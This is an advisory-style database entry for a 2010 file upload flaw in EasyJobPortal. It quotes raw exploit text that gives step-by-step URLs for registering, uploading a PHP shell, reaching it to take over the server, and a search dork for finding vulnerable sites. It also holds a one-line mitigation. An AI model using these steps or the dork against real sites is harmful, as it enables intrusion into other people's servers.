Vendor: EasyJobPortal
By: MeGo
CVSS: 7.5 (HIGH)
Type: Remote File Upload
CWE: 434
Product Name: EasyJobPortal
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

EasyJobPortal << upload shell

EasyJobPortal is vulnerable to a remote file upload vulnerability. An attacker can register on the website, create a new document and upload a malicious shell.php file. The attacker can then access the shell.php file by editing the document. This allows the attacker to gain access to the server.

Mitigation:

Ensure that all user-uploaded files are validated and sanitized before being stored on the server.

Exploit-DB raw data:

#################################################################
# Exploit :  EasyJobPortal << upload shell

# Date    :  13-11-2010

# Author  :  MeGo

# Version :  n/a

# DorK    :  inurl:jobseeker_register.php  

# Home    :  WwW.P0C.cC/vb

# Email   :  EG5-@hotmail.com , M3GO@live.com

# Vendor  :  http://www.easyjobportal.com
################################################################# 

[+] Exploit

[1] Register First ..
[-] http://localhost/path/jobseeker_register.php

[2] Create New Upload Your Shell.php ..
[-] http://localhost/path/jobseeker_document.php

[3] To See Shell Edit Your Document
[-] http://localhost/path/files/document/1/Shell.php

[4] Now Your R00T Box

[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]

Great 2 : P0C Member , Roots , V4-Team Members , Roots

SGreatz : X-Father , Mo7a , My Keybord :D

./D0n3

[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]-[#]